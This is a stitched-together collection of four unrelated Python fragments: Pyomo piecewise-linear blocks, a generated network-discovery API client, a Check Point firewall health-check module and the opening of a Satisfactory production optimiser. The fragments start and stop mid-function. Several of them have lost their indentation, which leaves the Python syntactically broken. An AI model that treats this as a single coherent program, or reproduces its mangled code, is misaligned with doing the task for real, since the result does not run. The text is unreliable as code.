    b.single_region_c = Constraint(b.t,rule=single_region_rule)
    return b
def PWL_Block(t,df):
    """Wrap a sampled characteristic *df* (input columns plus an output
    column last) in a Block carrying a piecewise-linear interpolation.
    Dispatches to the N-D Delaunay-triangulated formulation when there are
    two or more inputs, otherwise to the 1-D SOS2 formulation."""
    data = df.values
    names = df.columns
    outputs = data[:,-1].reshape(-1,)
    inputs = data[:,:-1]
    # Declare the block and its variables.
    blk = Block(concrete=True)
    blk.t = t
    blk.Vars = Var(blk.t, names)
    blk.Stage = Var(within=Binary)
    blk.VarNames = names
    # Attach the piecewise surface characteristic.
    if len(names) > 2:
        # Several input columns: triangulate the sampled input space.
        blk.PW = BuildPiecewiseND_1S(blk.Vars, names, Delaunay(inputs), outputs, blk.t, blk.Stage)
    else:
        # Single input column: 1-D piecewise-linear curve.
        blk.PW = BuildPiecewise1D_1S(blk.Vars, names, inputs.reshape(-1,), outputs, blk.t, blk.Stage)
    return blk
def BlockStages_N(t,*Blocks):
# Формируем ограничения по группе турбин
b = Block(concrete=True)
b.t = t
# Определяем список имён переменных
BlockVarNames=[]
for Bl in Blocks:
for vn in Bl.VarNames:
if vn not in BlockVarNames:
BlockVarNames.append(vn)
# Создаём переменные
b.Vars = Var(b.t, BlockVarNames)
# Переменная состояния
b.Stage = Var(within=Binary)
| |
#!/usr/bin/env python
#pylint: skip-file
# This source code is licensed under the Apache license found in the
# LICENSE file in the root directory of this project.
import sys
import os
import urllib.request, urllib.parse, urllib.error
from .models import *
class DiscoveryApi(object):
    def __init__(self, apiClient):
        # All HTTP transport and (de)serialization is delegated to the
        # injected API client; this class only assembles request parameters.
        self.apiClient = apiClient
def updateDiscovery(self, **kwargs):
"""Updates an existing discovery specified by id - only for starting/stopping the discovery
Args:
discovery, DiscoveryNIO: Discovery request that holds the status of discovery as active / inactive (required)
Returns: TaskIdResult
"""
allParams = ['discovery']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDiscovery" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('discovery' in params):
bodyParam = params['discovery']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def insertDiscovery(self, **kwargs):
"""Starts a new discovery process and returns a task-id
Args:
request, InventoryRequest: Discovery request that holds the parameters required for discovery (required)
Returns: TaskIdResult
"""
allParams = ['request']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method insertDiscovery" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('request' in params):
bodyParam = params['request']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def deleteAllDiscovery(self, **kwargs):
"""Deletes all discovery
Args:
Returns: TaskIdResult
"""
allParams = []
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteAllDiscovery" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def getDiscoveryCount(self, **kwargs):
"""Retrieves the number of discoveries
Args:
Returns: CountResult
"""
allParams = []
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryCount" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/count'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'CountResult')
return responseObject
def getDiscoveryJobsByIp(self, **kwargs):
"""Retrieves the list of discovery jobs for the given IP
Args:
offset, int: offset (required)
limit, int: limit (required)
ipAddress, str: ipAddress (required)
Returns: DiscoveryJobNIOListResult
"""
allParams = ['offset', 'limit', 'ipAddress']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryJobsByIp" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/job'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('offset' in params):
queryParams['offset'] = self.apiClient.toPathValue(params['offset'])
if ('limit' in params):
queryParams['limit'] = self.apiClient.toPathValue(params['limit'])
if ('ipAddress' in params):
queryParams['ipAddress'] = self.apiClient.toPathValue(params['ipAddress'])
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DiscoveryJobNIOListResult')
return responseObject
def getDiscoveryById(self, **kwargs):
"""Retrieves the discovery specified by id
Args:
id, str: Discovery ID (required)
Returns: DiscoveryNIOResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryById" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DiscoveryNIOResult')
return responseObject
def deleteDiscoveryById(self, **kwargs):
"""Deletes the discovery specified by id
Args:
id, str: Discovery ID (required)
Returns: TaskIdResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteDiscoveryById" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def getDiscoveryJobsById(self, **kwargs):
"""Retrieves list of discovery jobs for the specified discovery id
Args:
id, str: Discovery ID (required)
offset, int: offset (required)
limit, int: limit (required)
ipAddress, str: ipAddress (required)
Returns: DiscoveryJobNIOListResult
"""
allParams = ['id', 'offset', 'limit', 'ipAddress']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDiscoveryJobsById" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}/job'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('offset' in params):
queryParams['offset'] = self.apiClient.toPathValue(params['offset'])
if ('limit' in params):
queryParams['limit'] = self.apiClient.toPathValue(params['limit'])
if ('ipAddress' in params):
queryParams['ipAddress'] = self.apiClient.toPathValue(params['ipAddress'])
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DiscoveryJobNIOListResult')
return responseObject
def getNetworkDeviceByDiscoveryId(self, **kwargs):
"""Retrieves the network devices discovered in the discovery specified by id
Args:
taskId, str: taskId (required)
id, str: id (required)
Returns: NetworkDeviceNIOListResult
"""
allParams = ['taskId', 'id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getNetworkDeviceByDiscoveryId" % key)
params[key] = val
del params['kwargs']
resourcePath = '/discovery/{id}/network-device'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
| |
<gh_stars>1-10
#
# Copyright 2020 by 0x7c2, <NAME>.
# All rights reserved.
# This file is part of the Report/Analytic Tool - CPme,
# and is released under the "Apache License 2.0". Please see the LICENSE
# file that should have been included as part of this package.
#
from subprocess import Popen, PIPE
import sqlite3
import time
import logme
import files
import func
import kernel
# Menu title shown by the CPme menu framework.
menu_text = "Health Analysis"
# Menu entries as [label, python-expression] pairs; the framework evaluates
# the second element when the entry is selected.
menu_item = [ ["Run all checks", "health.check_all(True)"],
    ["Check memory usage", "health.check_memory(True)"],
    ["Check disk space", "health.check_diskspace(True)"],
    ["Check cpu usage", "health.check_cpu(True)"],
    ["Check system crash", "health.check_crash(True)"],
    ["Check system logfiles", "health.check_log_system(True)"],
    ["Check processes", "health.check_process(True)"],
    ["Check NTP and Time", "health.check_ntp(True)"]]
# Checks that only make sense on a firewall gateway.
if func.isFirewall():
    menu_item.append(["Check Firewall Fragments", "health.check_fw_fragments(True)"])
    menu_item.append(["Check kernel table overflow", "health.check_table_overflow(True)"])
    menu_item.append(["Check Aggressive Aging", "health.check_fw_aggressive(True)"])
    menu_item.append(["Check memory allocations", "health.check_failedalloc(True)"])
    menu_item.append(["Check interface statistics", "health.check_interfaces(True)"])
    menu_item.append(["Check licensing", "health.check_licensing(True)"])
    menu_item.append(["Check overlapping encdoms", "health.check_overlap_encdom(True)"])
    menu_item.append(["Check SIC State", "health.check_sic_state(True)"])
    menu_item.append(["Check firewall mode", "health.check_fw_mode(True)"])
    menu_item.append(["Check blade update status", "health.check_blade_update(True)"])
    menu_item.append(["Check CoreXL dispatcher stats", "health.check_dispatcher(True)"])
    menu_item.append(["Check CoreXL connections", "health.check_multik_stat(True)"])
    menu_item.append(["Check active Blades", "health.check_blades(True)"])
    menu_item.append(["Check protection parsers", "health.check_parsers(True)"])
# Checks that additionally require cluster membership.
if func.isFirewall() and func.isCluster():
    menu_item.append(["Check ClusterXL state", "health.check_clusterxl_state(True)"])
    menu_item.append(["Check ClusterXL sync stat", "health.check_clusterxl_sync(True)"])
    menu_item.append(["Check ClusterXL PNotes", "health.check_clusterxl_pnote(True)"])
    menu_item.append(["Check fwha_version", "health.check_fwha_version(True)"])
    # CCP check is only supported on these releases.
    if func.fwVersion() == "R80.30" or func.fwVersion() == "R80.40":
        menu_item.append(["Check ClusterXL CCP", "health.check_clusterxl_ccp(True)"])
    if func.fwVersion() == "R80.40":
        menu_item.append(["Check ClusterXL Multiversion", "health.check_clusterxl_release(True)"])
# Checks for management servers.
if func.isManagement():
    menu_item.append(["Check Management Status", "health.check_mgmt_status(True)"])
    menu_item.append(["Check Management API", "health.check_mgmt_api(True)"])
    menu_item.append(["Check GUI Clients", "health.check_mgmt_gui(True)"])
    menu_item.append(["Check Database Locks", "health.check_mgmt_dblock(True)"])
    menu_item.append(["Check Database Verifications","health.check_mgmt_validations(True)"])
    menu_item.append(["Check IPS Update Status", "health.check_mgmt_updateips(True)"])
# IPMI checks only when the hardware exposes sensors.
if len(func.ipmiInfo())>0:
    menu_item.append(["Check IPMI Sensor Database", "health.check_ipmi_sensor(True)"])
menu_item.append(["Back to Main Menu", "menu_set('main')"])
def add_text():
    # Menu framework hook: returns this module's menu title.
    return menu_text
def add_item():
    # Menu framework hook: returns this module's menu entries.
    return menu_item
# Accumulated check results; each row is [title, detail, state, category].
results = []
def get_results(clear = False):
    """Return the collected result rows, optionally resetting the buffer."""
    global results
    snapshot = results
    if clear:
        results = []
    return snapshot
def check_ipmi_sensor(printRes = False):
    """Record one result row per populated IPMI sensor reading."""
    global results
    title = "IPMI Sensor"
    for entry in func.ipmiInfo():
        sensor, value, vtype, sstate = [entry[i].strip(' ') for i in range(4)]
        # Sensors without a usable reading are skipped entirely.
        if value in ("na", "0x0", "0.000"):
            continue
        if sstate == "ok":
            state = "PASS"
        elif sstate == "na":
            state = "INFO"
        else:
            state = "WARN"
        results.append([title + " [" + sensor + "]", value + " " + vtype, state, "IPMI Sensor"])
    if printRes:
        print_results()
def check_blade_update(printRes = False):
    # Verifies the update status of the URL Filtering, Anti-Bot, Anti-Virus
    # and Application Control blades via "cpstat -f update_status".
    global results
    title = "Check blade update status"
    # [display name, cpstat flavour, zero-based line index in the output];
    # AntiBot/AntiVirus share the "antimalware" flavour and differ only in
    # which output line is inspected.
    stat = [ ["URL Filtering", "urlf", 0],
            ["AntiBot", "antimalware", 0],
            ["AntiVirus", "antimalware", 1],
            ["Application Control", "appi", 0]]
    i = 0
    oldcmd = ""
    while i < len(stat):
        logme.loader()
        newcmd = "cpstat -f update_status " + stat[i][1] + " | grep 'Update status'"
        # The output stream can be read only once, so consecutive blades
        # sharing the same command reuse the cached "data" from the
        # previous iteration instead of re-running cpstat.
        if oldcmd != newcmd:
            out, err = func.execute_command(newcmd)
            oldcmd = newcmd
            data = out.read().split('\n')
        val = stat[i][2]
        # Extract the value after the colon on this blade's output line.
        line = data[val].split(':')[1].strip(' ').strip('\n')
        state = "FAIL"
        detail = ""
        if line == "-" or line == "":
            state = "INFO"
            detail = "not active"
        if line == "up-to-date":
            state = "PASS"
            detail = "up-to-date"
        results.append([title + " (" + stat[i][0] + ")", detail, state, "Updates"])
        i = i + 1
    if printRes:
        print_results()
def check_fw_mode(printRes = False):
    """Detect via lsmod whether the firewall runs in kernel or user mode."""
    global results
    title = "Check firewall mode"
    logme.loader()
    out, err = func.execute_command("lsmod")
    modules = out.read()
    # Default when neither marker module is present.
    state, detail = "FAIL", "Could not determine"
    if "fwmod" in modules:
        state, detail = "WARN", "User Mode"
    # Kernel mode wins if both markers appear.
    if "fw_0" in modules:
        state, detail = "INFO", "Kernel Mode"
    results.append([title, detail, state, "Firewall"])
    if printRes:
        print_results()
def check_mgmt_gui(printRes = False):
    """Warn when SmartConsole GUI access is allowed from any host."""
    global results
    title = "Checking GUI Clients"
    logme.loader()
    out, err = func.execute_command("cp_conf client get")
    clients = out.read().replace('\n', '').strip(' ')
    if clients == "Any":
        state, detail = "WARN", "Any"
    else:
        state, detail = "PASS", ""
    results.append([title, detail, state, "Management"])
    if printRes:
        print_results()
def check_parsers(printRes = False):
    """List the configured protection parser profiles (informational only)."""
    global results
    title = "Checking protection parsers"
    logme.loader()
    state = "INFO"
    out, err = func.execute_command('cat $FWDIR/state/local/FW1/local.set | grep -A4 parser_settings_profile | grep ":val" | uniq | awk "{print $2}" | tr -d "()"')
    for raw in out:
        logme.loader()
        cleaned = raw.strip('\n').replace(':val ', '').replace('"', '')
        results.append([title, cleaned, state, "Firewall"])
    if printRes:
        print_results()
def check_blades(printRes = False):
    """Enumerate software blade states from "fw stat -b AMW".

    Fixes: the label "Thread Prevention Policy" was a typo for
    "Threat Prevention Policy", and the inner command no longer rebinds
    the *out* stream that the outer loop is iterating.
    """
    global results
    title = "Checking active Blades"
    logme.loader()
    out, err = func.execute_command("fw stat -b AMW")
    for line in out:
        logme.loader()
        if ":" in line:
            tmp = line.strip('\n').split(":")
            blade = tmp[0].strip(' ')
            status = tmp[1].strip(' ')
        else:
            blade = ""
            status = ""
        # Only report real enable/disable rows; fileapp_ctx_enabled is noise.
        if ("enable" in status.lower() or "disable" in status.lower()) and "fileapp_ctx_enabled" not in status.lower():
            results.append([title + " (" + blade + ")", status, "INFO", "Blades"])
        # When IPS is enabled, additionally list the configured profiles.
        if blade == "IPS" and "enable" in status.lower():
            out2, err2 = func.execute_command('cat $FWDIR/state/local/AMW/local.set | grep -A15 malware_profiles | grep ":name" | awk "{print $2}" | tr -d "()"')
            for l in out2:
                results.append(["Threat Prevention Policy", l.strip('\n').replace(':name ', ''), "INFO", "Blades"])
    if printRes:
        print_results()
def check_dispatcher(printRes = False):
    """Flag any non-zero CoreXL dispatcher enqueue-failure counter."""
    global results
    title = "Checking Dispatcher statistics"
    logme.loader()
    out, err = func.execute_command("fw ctl pstat -m | grep -i 'fwmultik enqueue fail stats' -A 22 | grep -v 'fail stats:'")
    found_error = False
    for line in out.read().split('\n'):
        parts = line.split(":")
        if len(parts) < 2:
            continue
        counter = parts[0].replace('\t', '').strip(' ')
        value = parts[1].strip(' ')
        if value != '0':
            found_error = True
            results.append([title + " [" + counter + "]", value, "WARN", "CoreXL"])
    if not found_error:
        results.append([title, "", "PASS", "CoreXL"])
    if printRes:
        print_results()
def check_mgmt_dblock(printRes = False):
    """Report open management work sessions that still hold database locks."""
    global results
    title = "Checking Database Locks"
    logme.loader()
    out, err = func.execute_command("psql_client cpm postgres -c \"select applicationname,objid,creator,state,numberoflocks,numberofoperations,creationtime,lastmodifytime from worksession where state = 'OPEN' and (numberoflocks != '0' or numberofoperations != '0');\" | tail -n2 | head -n1")
    row = out.read().replace('\n', '')
    # "(0 rows)" from psql means no session is holding locks.
    if row == "(0 rows)":
        state, detail = "PASS", ""
    else:
        state, detail = "WARN", row
    results.append([title, detail, state, "Management"])
    if printRes:
        print_results()
def check_mgmt_validations(printRes = False):
    """Check the "*-total" validation counters reported by mgmt_cli."""
    global results
    title = "Checking validations"
    logme.loader()
    out, err = func.execute_command("mgmt_cli -r true --unsafe true show validations")
    for line in out.read().split('\n'):
        if "-total" not in line:
            continue
        parts = line.split(":")
        typ = parts[0]
        val = parts[1].strip(' ')
        if val == "0":
            state, detail = "PASS", ""
        else:
            state, detail = "WARN", val
        results.append([title + " [" + typ + "]", detail, state, "Management"])
    if printRes:
        print_results()
def check_clusterxl_sync(printRes = False):
    """Check ClusterXL sync health via "cphaprob syncstat".

    Reports the overall sync status plus any non-zero loss/reject
    statistic.  Fix: *state*/*detail* are initialised before the parsing
    loop; previously a statistics line appearing before the "Sync status"
    line raised UnboundLocalError.
    """
    global results
    title = "Checking ClusterXL Sync"
    logme.loader()
    fields = ["Lost updates", "Lost bulk update events", "Oversized updates not sent", "Sent reject notifications", "Received reject notifications"]
    out, err = func.execute_command("cphaprob syncstat")
    data = out.read().split('\n')
    error = False
    # Defaults used when a statistics row precedes the status row.
    state = "PASS"
    detail = ""
    for d in data:
        # check sync status
        if "Sync status" in d:
            tmp = d.split(":")
            field = tmp[0].strip(' ')
            val = tmp[1].strip(' ')
            if val == "OK":
                state = "PASS"
                detail = ""
            else:
                state = "FAIL"
                detail = val
            results.append([title + " [" + field + "]", detail, state, "ClusterXL"])
        # check statistics counters
        for f in fields:
            if f in d:
                val = d.replace(f, '').replace('.','').strip()
                if val != "0":
                    state = "WARN"
                    detail = val
                    error = True
                results.append([title + " [" + f + "]", detail, state, "ClusterXL"])
    if not error:
        results.append([title + " [Statistics]", "", "PASS", "ClusterXL"])
    if printRes:
        print_results()
def check_mgmt_updateips(printRes = False):
    """Verify that the IPS package on the management is up to date."""
    global results
    title = "Checking IPS Update Status"
    logme.loader()
    out, err = func.execute_command("mgmt_cli -r true --unsafe true show-ips-status | grep update-available")
    answer = out.read().replace('\n', '')
    if answer == "update-available: false":
        state, detail = "PASS", ""
    else:
        state, detail = "WARN", answer
    results.append([title, detail, state, "Management"])
    if printRes:
        print_results()
def check_mgmt_api(printRes = False):
    """Check that the management API server reports "Started"."""
    global results
    title = "Checking Management API Status"
    logme.loader()
    out, err = func.execute_command("echo y | api status | grep Overall | awk '{ print $4 }'")
    status = out.read().strip('\n').strip(' ')
    state = "PASS" if status == "Started" else "FAIL"
    results.append([title, status, state, "Management"])
    if printRes:
        print_results()
def check_mgmt_status(printRes = False):
    """Check the overall management server status via cpstat."""
    global results
    title = "Checking Management Status"
    logme.loader()
    out, err = func.execute_command("cpstat mg | grep Status | awk '{print $2}'")
    status = out.read().strip('\n').strip(' ')
    state = "PASS" if status == "OK" else "FAIL"
    results.append([title, status, state, "Management"])
    if printRes:
        print_results()
def check_overlap_encdom(printRes = False):
    """Fail when VPN encryption domains overlap between gateways."""
    global results
    title = "Checking overlapping encryption domain"
    logme.loader()
    out, err = func.execute_command("vpn overlap_encdom | grep -c 'No overlapping encryption domain.'")
    # grep -c prints "1" when the all-clear message is present.
    state = "PASS" if out.read().strip('\n') == "1" else "FAIL"
    results.append([title, "", state, "VPN"])
    if printRes:
        print_results()
def check_ntp(printRes = False):
    """Verify that the system clock is NTP-synchronised.

    Fix: the grep count is validated before conversion; an empty result
    (e.g. ntpstat not installed) now yields FAIL instead of raising
    ValueError on int('').
    """
    global results
    title = "Checking NTP and Time"
    logme.loader()
    out, err = func.execute_command("ntpstat | grep -ic 'synchronised to'")
    raw = out.read().strip('\n').strip(' ')
    state = "PASS" if raw.isdigit() and int(raw) > 0 else "FAIL"
    results.append([title, "", state, "GAiA"])
    if printRes:
        print_results()
def check_licensing(printRes = False):
    # Parses the pipe-separated table from "cpstat os -f licensing".
    # Column layout: [2]=blade, [3]=status, [4]=expiration, [6]=active,
    # [7]=quota, [8]=used.
    global results
    title = "Checking licensing"
    logme.loader()
    out, err = func.execute_command("cpstat os -f licensing | grep '|' | awk 'NR>1 {print $0}'")
    for line in out:
        logme.loader()
        state = "FAIL"
        data = line.strip('\n').split('|')
        blade = data[2].strip(" ")
        status = data[3].strip(" ")
        expiration = data[4].strip(" ")  # currently unreported
        active = data[6].strip(" ")
        quota = data[7].strip(" ")  # currently unreported
        used = data[8].strip(" ")  # currently unreported
        if status == "Not Entitled":
            state = "INFO"
        # An expired license with no active instances is only a warning.
        if status == "Expired" and active == "0":
            state = "WARN"
        if status == "Entitled":
            state = "PASS"
        results.append([title + " (Blade: "+blade+")", status, state, "Licensing"])
    if printRes:
        print_results()
def check_sic_state(printRes = False):
    """Check SIC trust via "cp_conf sic state".

    Fix: *detail* is initialised before the loop; previously an empty
    command output raised UnboundLocalError at the results.append call.
    """
    global results
    title = "Checking SIC State"
    logme.loader()
    out, err = func.execute_command("cp_conf sic state")
    state = "FAIL"
    detail = ""
    for line in out:
        logme.loader()
        data = line.strip('\n')
        # Remember the last non-empty output line as the detail text.
        if data != "":
            detail = data
        if "Trust established" in data:
            state = "PASS"
    results.append([title, detail, state, "Management"])
    if printRes:
        print_results()
def check_fw_fragments(printRes = False):
    """Inspect firewall fragment counters; large values indicate trouble."""
    global results
    title = "Checking Firewall Fragments"
    logme.loader()
    out, err = func.execute_command("cpstat -f fragments fw | awk 'NR>2 {print $0}'")
    for raw in out:
        logme.loader()
        line = raw.strip('\n')
        if line == "":
            continue
        parts = line.split(":")
        field = parts[0].strip(' ')
        value = parts[1].strip(' ')
        # 0 is clean, a small count is a warning, anything else fails.
        if value == "0":
            state = "PASS"
        elif int(value) < 100:
            state = "WARN"
        else:
            state = "FAIL"
        results.append([title + " (" + field + ")", value, state, "Firewall"])
    if printRes:
        print_results()
def check_table_overflow(printRes = False):
global results
title = "Check kernel table overflow"
logme.loader()
tables = ['connections', 'fwx_cache']
for t in tables:
logme.loader()
out, err = func.execute_command("fw tab -t " + t + " | grep limit")
out = out.read().strip('\n').split(',')
if out[len(out)-1].strip(' ') == "unlimited":
results.append([title + " [" + t + "]", "unlimited", "PASS", "Firewall"])
else:
logme.loader()
t_limit = int(out[len(out)-1].replace('limit ','').strip(' '))
out, err = func.execute_command("fw tab -t " + t + " -s | grep " + t)
out = out.read().strip('\n').split()
t_peak = int(out[4])
t_val = int(out[3])
m = False
if t_peak > (t_limit * 0.9):
results.append([title + " [" + t + "]", "peak: " + str(t_peak) + "/" + str(t_limit), "WARN", "Firewall"])
m = True
if t_val > (t_limit * 0.9):
results.append([title + " [" + t + "]", "current: " + str(t_val) + "/" + str(t_limit), "FAIL", "Firewall"])
m = True
if not m:
results.append([title + " | |
#!/usr/bin/env python
# coding: utf-8
import scipy.optimize
import json
import numpy as np
import re
import sys
import math
import argparse
from collections import defaultdict
from pprint import pprint
def float_list(s):
    """Parse a comma-separated string into floats; empty/None yields []."""
    if not s:
        return []
    return [float(part) for part in s.split(",")]
# Command-line options controlling the LP objective penalties, transport
# costs and the clock-speed choices made available to the optimizer.
parser = argparse.ArgumentParser()
parser.add_argument("--transport-power-cost", type=float, default=50.0,
    help="added power cost for transport per conveyor/pipeline of mined resource")
parser.add_argument("--drone-battery-cost", type=float, default=0.5,
    help="added battery cost for drone transport per conveyor/pipeline of mined resource")
parser.add_argument("--machine-penalty", type=float, default=2000.0,
    help="objective penalty per machine built")
parser.add_argument("--conveyor-penalty", type=float, default=0.0,
    help="objective penalty per conveyor belt needed")
parser.add_argument("--pipeline-penalty", type=float, default=0.0,
    help="objective penalty per pipeline needed")
parser.add_argument("--power-shard-penalty-ratio", type=float, default=0.6,
    help="objective penalty per power shard used, specified as ratio of machine penalty")
parser.add_argument("--extra-miner-clocks", type=float_list, default=[],
    help="extra clock choices for miners, specified as decimals")
parser.add_argument("--extra-manufacturer-clocks", type=float_list, default=[0.25, 0.5, 0.75],
    help="extra clock choices for manufacturers, specified as decimals")
parser.add_argument("--allow-waste", action="store_true",
    help="allow accumulation of nuclear waste and other unsinkable items")
parser.add_argument("--show-unused", action="store_true",
    help="show unused LP columns (coeff 0) in the optimization result")
parser.add_argument("--xlsx-report", type=str, default="Report.xlsx",
    help="path to xlsx report output")
parser.add_argument("--xlsx-sheet-suffix", type=str, default="",
    help="suffix to add to xlsx sheet names")
args = parser.parse_args()
### Constants ###
# Common
# Item stack sizes keyed by the Docs.json mStackSize tag.
# NOTE(review): SS_FLUID=50000 is presumably the fluid unit scale used by
# the game data (mL per packaging unit) — confirm against Docs.json units.
STACK_SIZES = {
    "SS_HUGE": 500,
    "SS_BIG": 200,
    "SS_MEDIUM": 100,
    "SS_SMALL": 50,
    "SS_ONE": 1,
    "SS_FLUID": 50000,
}
# Each machine accepts at most this many power shards.
MACHINE_POWER_SHARD_LIMIT = 3
# Tolerance below which LP coefficients are treated as zero.
EPSILON = 1e-9
# Logistics
CONVEYOR_BELT_CLASS = "Build_ConveyorBeltMk5_C"
PIPELINE_CLASS = "Build_PipelineMK2_C"
# Resource extraction
MINER_CLASS = "Build_MinerMk3_C"
OIL_EXTRACTOR_CLASS = "Build_OilPump_C"
WATER_EXTRACTOR_CLASS = "Build_WaterPump_C"
RESOURCE_WELL_EXTRACTOR_CLASS = "Build_FrackingExtractor_C"
RESOURCE_WELL_PRESSURIZER_CLASS = "Build_FrackingSmasher_C"
# Sink
SINK_CLASS = "Build_ResourceSink_C"
# Water
WATER_CLASS = "Desc_Water_C"
# Nuclear power
# Maps a fuel rod to the waste item its generator produces.
NUCLEAR_WASTE_MAPPINGS = {
    "Desc_NuclearFuelRod_C": "Desc_NuclearWaste_C",
    "Desc_PlutoniumFuelRod_C": "Desc_PlutoniumWaste_C",
}
# Geothermal power
GEOTHERMAL_GENERATOR_CLASS = "Build_GeneratorGeoThermal_C"
GEYSER_CLASS = "Desc_Geyser_C"
# Resource map
# Extraction rate multipliers per resource node purity.
PURITY_MULTIPLIERS = {
    "impure": 0.5,
    "normal": 1.0,
    "pure": 2.0,
}
# Power shards obtained per slug type.
POWER_SLUG_SHARDS = {
    "greenSlugs": 1,
    "yellowSlugs": 2,
    "purpleSlugs": 5,
}
# Map-data resource ids that need renaming (or exclusion via None).
RESOURCE_MAPPINGS = {
    "Desc_LiquidOilWell_C": "Desc_LiquidOil_C",
    "Desc_SAM_C": None, # exclude
}
# Miscellaneous
BIOMASS_GENERATOR_CLASS = "Build_GeneratorBiomass_C"
BATTERY_CLASS = "Desc_Battery_C"
# Items that are missing from Docs.json and must be injected manually.
ADDITIONAL_ITEMS = {
    "Desc_PlutoniumWaste_C": {
        "class": "Desc_PlutoniumWaste_C",
        "display_name": "Plutonium Waste",
        "form": "RF_SOLID",
        "points": 0,
        "stack_size": STACK_SIZES["SS_HUGE"],
        "energy": 0.0,
    },
}
# Display names for pseudo-items that have no Docs.json entry.
ADDITIONAL_DISPLAY_NAMES = {
    GEYSER_CLASS: "Geyser",
}
docs_path = r"Docs.json"
map_info_path = r"MapInfo.json"
# Docs.json ships UTF-16 encoded; it is a list of native-class groups.
